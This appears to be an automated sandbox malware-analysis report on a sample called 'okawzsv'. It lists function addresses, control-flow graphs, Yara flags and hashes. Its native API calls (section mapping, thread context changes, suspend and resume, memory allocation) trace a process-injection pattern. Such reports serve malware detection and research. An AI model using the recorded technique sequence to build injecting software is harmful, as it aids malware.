90157->90105 90158->90117 90160 42b343 90159->90160 90161 42b3a0 90160->90161 90162 42a2a3 2 API calls 90160->90162 90161->90121 90163 42b37d 90162->90163 90164 42a1c3 2 API calls 90163->90164 90164->90161 90165->90126 90166->90129 90167->90127 90168->90130 90169->90143 90170->90150 90171->90155 90194 41a553 90202 4276e3 90194->90202 90196 41a597 90197 41a5b8 90196->90197 90209 427873 90196->90209 90199 41a5a8 90200 41a5c4 90199->90200 90201 4283b3 2 API calls 90199->90201 90201->90197 90203 427701 90202->90203 90204 42773e 90202->90204 90206 4293b3 LdrLoadDll 90203->90206 90205 4293b3 LdrLoadDll 90204->90205 90207 427754 90205->90207 90208 42771e 90206->90208 90207->90196 90208->90196 90210 4278c6 90209->90210 90211 427891 90209->90211 90213 4293b3 LdrLoadDll 90210->90213 90212 4293b3 LdrLoadDll 90211->90212 90214 4278ae 90212->90214 90215 4278dc 90213->90215 90218 409e53 90214->90218 90215->90199 90217 4278bf 90217->90199 90221 409e78 90218->90221 90219 409f95 NtSuspendThread 90220 409fb0 90219->90220 90220->90217 90221->90219 90222 418598 90223 4283b3 2 API calls 90222->90223 90224 4185a2 90223->90224 90172 aa2b60 LdrInitializeThunk

                                                                                                                        Executed Functions

                                                                                                                        Function 0040AAC3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186nativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,to@,?,?,?,00000000), ref: 0040AC2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SectionView
                                                                                                                        • String ID: to@$to@
                                                                                                                        • API String ID: 1323581903-3423273117
                                                                                                                        • Opcode ID: 676d8c6312eacfc3e320d3e475f7c7686042c1811537bcf82107781b5a2d1997
                                                                                                                        • Instruction ID: 88c6af07cecda7dc52f2954e71423d245eb0154dddc4a1c440b087aa91dd83bd
                                                                                                                        • Opcode Fuzzy Hash: 676d8c6312eacfc3e320d3e475f7c7686042c1811537bcf82107781b5a2d1997
                                                                                                                        • Instruction Fuzzy Hash: 2F714CB1E04258DFCB04CFA9C490AEDBBF2AF8D304F18816AE459B7341D638A951CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A8A3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180nativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 108 40a8a3-40a8c2 109 40a8c8-40a907 call 409903 108->109 110 40a8c3 call 4098f3 108->110 113 40a9e5-40aa0e NtCreateSection 109->113 114 40a90d-40a952 call 409993 call 42b7c2 call 409863 call 42b7c2 109->114 110->109 116 40aa14-40aa1b 113->116 117 40aaab-40aab7 113->117 136 40a95d-40a963 114->136 119 40aa26-40aa2c 116->119 121 40aa54-40aa58 119->121 122 40aa2e-40aa52 119->122 125 40aa9a-40aaa8 call 409993 121->125 126 40aa5a-40aa61 121->126 122->119 125->117 128 40aa6c-40aa72 126->128 128->125 132 40aa74-40aa98 128->132 132->128 137 40a965-40a989 136->137 138 40a98b-40a98f 136->138 137->136 138->113 139 40a991-40a9ac 138->139 141 40a9b7-40a9bd 139->141 141->113 142 40a9bf-40a9e3 141->142 142->141
                                                                                                                        APIs
                                                                                                                        • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,1o@,00000000,?,?,08000000), ref: 0040AA01
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateSection
                                                                                                                        • String ID: 1o@
                                                                                                                        • API String ID: 2449625523-1313955917
                                                                                                                        • Opcode ID: c295ff44140c6a2b0e6634bd6207f40f99ab8758f9ee6ce411b7e9a0f5b707be
                                                                                                                        • Instruction ID: 28a81098a72d725d87d8893a00b6b3592a645c596d15c3f0b08f8818d347be54
                                                                                                                        • Opcode Fuzzy Hash: c295ff44140c6a2b0e6634bd6207f40f99ab8758f9ee6ce411b7e9a0f5b707be
                                                                                                                        • Instruction Fuzzy Hash: 60714CB1E04258DFCB04CFA9C591AEDBBF1AF89304F18806AE459B7381D638A952CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040ACF3 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 546 40acf3-40ad12 547 40ad18-40ad57 call 409903 546->547 548 40ad13 call 4098f3 546->548 551 40ae35-40ae6e NtCreateFile 547->551 552 40ad5d-40ada2 call 409993 call 42b7c2 call 409863 call 42b7c2 547->552 548->547 553 40ae74-40ae7b 551->553 554 40af0b-40af17 551->554 574 40adad-40adb3 552->574 556 40ae86-40ae8c 553->556 558 40aeb4-40aeb8 556->558 559 40ae8e-40aeb2 556->559 563 40aefa-40af08 call 409993 558->563 564 40aeba-40aec1 558->564 559->556 563->554 566 40aecc-40aed2 564->566 566->563 569 40aed4-40aef8 566->569 569->566 575 40adb5-40add9 574->575 576 40addb-40addf 574->576 575->574 576->551 578 40ade1-40adfc 576->578 579 40ae07-40ae0d 578->579 579->551 580 40ae0f-40ae33 579->580 580->579
                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AE61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 731e3f6e8ba2e523611b6b9351a583bbb6b3e0c411d973996869ef3de7769258
                                                                                                                        • Instruction ID: c6ec39a31f4d8b50fe65f8e64631f8413f779835fbb3720df3a48058bcedeb27
                                                                                                                        • Opcode Fuzzy Hash: 731e3f6e8ba2e523611b6b9351a583bbb6b3e0c411d973996869ef3de7769258
                                                                                                                        • Instruction Fuzzy Hash: 1C815FB1E04258DFCB04CFA9C490AEDBBF5AF8D304F18816AE459B7341D638A952CF95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040AF23 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 582 40af23-40af87 call 4098f3 call 409903 588 40b065-40b096 NtReadFile 582->588 589 40af8a-40afd2 call 409993 call 42b7c2 call 409863 call 42b7c2 582->589 590 40b133-40b13f 588->590 591 40b09c-40b0a3 588->591 613 40afdd-40afe3 589->613 592 40b0ae-40b0b4 591->592 594 40b0b6-40b0da 592->594 595 40b0dc-40b0e0 592->595 594->592 599 40b122-40b130 call 409993 595->599 600 40b0e2-40b0e9 595->600 599->590 601 40b0f4-40b0fa 600->601 601->599 604 40b0fc-40b120 601->604 604->601 614 40afe5-40b009 613->614 615 40b00b-40b00f 613->615 614->613 615->588 617 40b011-40b02c 615->617 618 40b037-40b03d 617->618 618->588 619 40b03f-40b063 618->619 619->618
                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B089
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 6ddc72b4f6202b06c465cb983a14ae959c414f6f1ea6b32d7fb0a6438048add9
                                                                                                                        • Instruction ID: d6619ef8149ede43c601ef0414cd975a016ba1077e4db4a125d4735272169ad1
                                                                                                                        • Opcode Fuzzy Hash: 6ddc72b4f6202b06c465cb983a14ae959c414f6f1ea6b32d7fb0a6438048add9
                                                                                                                        • Instruction Fuzzy Hash: 947130B1E04158DFCB04CFA9D890AEEBBF5AF4D304F18816AE459B7341D735A941CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040B7B3 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 621 40b7b3-40b817 call 4098f3 call 409903 626 40b8f5-40b91a NtAllocateVirtualMemory 621->626 627 40b81d-40b862 call 409993 call 42b7c2 call 409863 call 42b7c2 621->627 628 40b920-40b927 626->628 629 40b9b7-40b9c3 626->629 649 40b86d-40b873 627->649 631 40b932-40b938 628->631 633 40b960-40b964 631->633 634 40b93a-40b95e 631->634 638 40b9a6-40b9b4 call 409993 633->638 639 40b966-40b96d 633->639 634->631 638->629 641 40b978-40b97e 639->641 641->638 644 40b980-40b9a4 641->644 644->641 650 40b875-40b899 649->650 651 40b89b-40b89f 649->651 650->649 651->626 653 40b8a1-40b8bc 651->653 654 40b8c7-40b8cd 653->654 654->626 655 40b8cf-40b8f3 654->655 655->654
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B90D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 4a9d6b48f57e06537870ffc1ea9537e0d0a9dcc2f8f95f052032ee23512d9848
                                                                                                                        • Instruction ID: c2bc70c67c96ebf08775754c961f24cd964934424d3d7cdecbfbf4049ab5f95d
                                                                                                                        • Opcode Fuzzy Hash: 4a9d6b48f57e06537870ffc1ea9537e0d0a9dcc2f8f95f052032ee23512d9848
                                                                                                                        • Instruction Fuzzy Hash: 5B713CB1E04158DFCB04CFA9D490AEDBBF5AF89304F18806AE459B7351D738A942CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A063 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtGetContextThread.NTDLL(?,?), ref: 0040A1AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 7d74f337bfdbeb07ddfae0daa25d4316be1a32a843e8d25cbcf3dc9f1dcac047
                                                                                                                        • Instruction ID: 569fe0476a0aaca3de4d5581861cfc3fd9c06305b11eb610b2df8ad8e3e41c8d
                                                                                                                        • Opcode Fuzzy Hash: 7d74f337bfdbeb07ddfae0daa25d4316be1a32a843e8d25cbcf3dc9f1dcac047
                                                                                                                        • Instruction Fuzzy Hash: E97162B1E04258DFCB04CFA9C490AEDBBF1BF89314F1881AAE455BB381D638A951CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A273 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtSetContextThread.NTDLL(?,?), ref: 0040A3BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 1e982c93f9d650f9dbd291c9a03aa16e87ae41fa8a46d131f8671f23f8a9189f
                                                                                                                        • Instruction ID: b6393094b48186db1cd28faa6a2d1e77d08023efe8f8686be57df15e0784c314
                                                                                                                        • Opcode Fuzzy Hash: 1e982c93f9d650f9dbd291c9a03aa16e87ae41fa8a46d131f8671f23f8a9189f
                                                                                                                        • Instruction Fuzzy Hash: 617160B1E04258DFCB04CFA9D490AEDBBF1BF89304F18806AE855B7341D638A951DF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040B393 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtDelayExecution.NTDLL(000000CA,?,?,?,00000000), ref: 0040B4DE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DelayExecution
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1249177460-0
                                                                                                                        • Opcode ID: 939a7ef11426b680e6e28c661b4955a8a2544a13258ce9ecde5f03bee7dc1711
                                                                                                                        • Instruction ID: 2a0f2d4374a5b1372567ab7d7accfbe094e16785fb5b7fbcc333c631794ade9e
                                                                                                                        • Opcode Fuzzy Hash: 939a7ef11426b680e6e28c661b4955a8a2544a13258ce9ecde5f03bee7dc1711
                                                                                                                        • Instruction Fuzzy Hash: EB714E71E04158DFCB05CFA9D490AEDBBF1AF49314F1880AAE455B7381D738AA41DF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A483 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtResumeThread.NTDLL(000000CA,?,?,?,?), ref: 0040A5CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: 938f3f3cd1754befc6a863fc556910306b31119e5965b990b3011990cda5dcd5
                                                                                                                        • Instruction ID: 4b97a682b6224d7f281c8b5783285ffed00d0dd34314d56ea9491087e06bde8e
                                                                                                                        • Opcode Fuzzy Hash: 938f3f3cd1754befc6a863fc556910306b31119e5965b990b3011990cda5dcd5
                                                                                                                        • Instruction Fuzzy Hash: C4716FB1E04258DFCB04CFA9D890AEDBBF1BF89304F18806AE455B7381D638A952CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00409E53 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 657 409e53-409e72 658 409e78-409eb7 call 409903 657->658 659 409e73 call 4098f3 657->659 662 409f95-409faa NtSuspendThread 658->662 663 409ebd-409f02 call 409993 call 42b7c2 call 409863 call 42b7c2 658->663 659->658 664 409fb0-409fb7 662->664 665 40a047-40a053 662->665 685 409f0d-409f13 663->685 668 409fc2-409fc8 664->668 670 409ff0-409ff4 668->670 671 409fca-409fee 668->671 674 40a036-40a044 call 409993 670->674 675 409ff6-409ffd 670->675 671->668 674->665 678 40a008-40a00e 675->678 678->674 679 40a010-40a034 678->679 679->678 686 409f15-409f39 685->686 687 409f3b-409f3f 685->687 686->685 687->662 688 409f41-409f5c 687->688 690 409f67-409f6d 688->690 690->662 691 409f6f-409f93 690->691 691->690
                                                                                                                        APIs
                                                                                                                        • NtSuspendThread.NTDLL(?,?), ref: 00409F9D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SuspendThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3178671153-0
                                                                                                                        • Opcode ID: d69f2f010816b678afba4fc40191f73e037bb108183dfcae5047b080e2ee51d2
                                                                                                                        • Instruction ID: e2c7ee916660eead3b8b3a6cfbdb59a4db716f9a626befd2b0991b3cb207a41a
                                                                                                                        • Opcode Fuzzy Hash: d69f2f010816b678afba4fc40191f73e037bb108183dfcae5047b080e2ee51d2
                                                                                                                        • Instruction Fuzzy Hash: B9714EB1E04158DFCB05CFA9C590AEDBBF1AF89304F18806AE459B7382D639AD42DF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004173A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417415
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: d07f43acae5381c7935257da1f181071a1ba76ca27e944f1e8fe1308dfd9cdbf
                                                                                                                        • Instruction ID: dc88cab253082be26519daed94df5a19f06b394c94b2d24a4c846edb1bb7cedb
                                                                                                                        • Opcode Fuzzy Hash: d07f43acae5381c7935257da1f181071a1ba76ca27e944f1e8fe1308dfd9cdbf
                                                                                                                        • Instruction Fuzzy Hash: 340152B1E0010DA7DB10DAE5DC42FDEB3789B54304F008196ED1897240F634EB54CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004283B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(0041A5B8,?,?,00000000,?,0041A5B8,?,?,?,?,?,?,?,?,00000000,?), ref: 004283E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction ID: fb4f0cbf1e0c10db5c24081458ac51f9d778ab51e9cf6bed3cc3aba60fb7db93
                                                                                                                        • Opcode Fuzzy Hash: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction Fuzzy Hash: 03E086722406147BD120EA5ADC01FDB775CDFC5714F004019FA0867241C6717A1187F4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 691c32aad7ea011c864055a9942dac5d45730918708ba32afb5194ec345c619d
                                                                                                                        • Instruction ID: 5ec3cf9c37ef2151572e9d08d4669678ab8bc818e3699296627b1e10f18c447d
                                                                                                                        • Opcode Fuzzy Hash: 691c32aad7ea011c864055a9942dac5d45730918708ba32afb5194ec345c619d
                                                                                                                        • Instruction Fuzzy Hash: F9900261202400034205715C4814656400E87E0341B56C036E1015590EC9298991A525
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: ccd7f0725079a1715a992306af90d3a0e364f03417461e730e4a2d988c1129e7
                                                                                                                        • Instruction ID: fc3ed56283743860bc400e8830806cb84382648f70c92d0e87370c0b6fbc6077
                                                                                                                        • Opcode Fuzzy Hash: ccd7f0725079a1715a992306af90d3a0e364f03417461e730e4a2d988c1129e7
                                                                                                                        • Instruction Fuzzy Hash: C090023120148802D210715C880478A000D87D0341F5AC426A4425658E8A998991B521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: d909b32a3402e544cfe7bb58694297c16479cf202f26cf0bbd0b2f484cff54ed
                                                                                                                        • Instruction ID: d70474ec22015ab70f7d51efd5acb1cb97f85f53ab2bf7b8bc869af5e51b85e9
                                                                                                                        • Opcode Fuzzy Hash: d909b32a3402e544cfe7bb58694297c16479cf202f26cf0bbd0b2f484cff54ed
                                                                                                                        • Instruction Fuzzy Hash: 6390023120140413D211715C4904747000D87D0381F96C427A0425558E9A5A8A52E521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8fef974a26abab1d9226a0bf283ab3c88ae56032021c375136d12c81fe07fe42
                                                                                                                        • Instruction ID: 3df3765649e89596cbecca90e8d1633f727f6d0216879d8481de8417052ce089
                                                                                                                        • Opcode Fuzzy Hash: 8fef974a26abab1d9226a0bf283ab3c88ae56032021c375136d12c81fe07fe42
                                                                                                                        • Instruction Fuzzy Hash: AF90023160550402D200715C4914746100D87D0341F66C426A0425568E8B998A51A9A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00413A43 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 36 413a43-413a57 37 413a70 36->37 38 413a59-413a6e 36->38 39 413a72-413a75 37->39 40 413aeb-413aee 37->40 38->37 41 413ad3-413adc 39->41 42 413a77 39->42 43 413b60-413b77 40->43 44 413af0-413b04 40->44 45 413ade-413adf 41->45 50 413b78-413b79 43->50 46 413b07-413b26 44->46 45->46 48 413ae1-413ae7 45->48 49 413b28-413b31 46->49 48->45 51 413ae9 48->51 56 413b32-413b36 49->56 57 413b4e-413b5e 49->57 52 413b92-413b94 50->52 53 413b7b-413b7d 50->53 51->40 58 413c04-413c16 call 423da3 52->58 59 413b96-413b9e 52->59 53->50 55 413b7f 53->55 62 413b81-413b87 55->62 63 413bfc-413bfe 55->63 60 413b38-413b3e 56->60 61 413b8c 56->61 57->43 67 413c1d-413c2d 58->67 59->49 64 413b9f-413bba 59->64 65 413b44-413b4c 60->65 70 413c03 61->70 71 413b8e 61->71 62->65 69 413b89 62->69 66 413c00-413c02 call 4048a3 63->66 63->67 65->57 66->70 74 413c4d-413c53 67->74 75 413c2f-413c3e PostThreadMessageW 67->75 69->61 70->58 71->52 75->74 77 413c40-413c4a 75->77 77->74
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 0-2078129318
                                                                                                                        • Opcode ID: 0f66b951a97d18aba47b189e0c1e2a65124cbfb60d69032233e145e9f4b526c8
                                                                                                                        • Instruction ID: 2574eca6f2d5f56ccc1bd02e4798b5663dd9a0b1584a082032d17b550b407e84
                                                                                                                        • Opcode Fuzzy Hash: 0f66b951a97d18aba47b189e0c1e2a65124cbfb60d69032233e145e9f4b526c8
                                                                                                                        • Instruction Fuzzy Hash: AF51343AA086956BC712DF74DC815D6FFB4FE4275571801CED5809B243F329AA8387C9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00413BBD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 78 413bbd-413bd5 79 413bdd-413c00 call 42ac73 call 4173a3 78->79 80 413bd8 call 42a263 78->80 85 413c07-413c2d call 423da3 79->85 86 413c02 call 4048a3 79->86 80->79 90 413c4d-413c53 85->90 91 413c2f-413c3e PostThreadMessageW 85->91 86->85 91->90 92 413c40-413c4a 91->92 92->90
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 00413C3A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
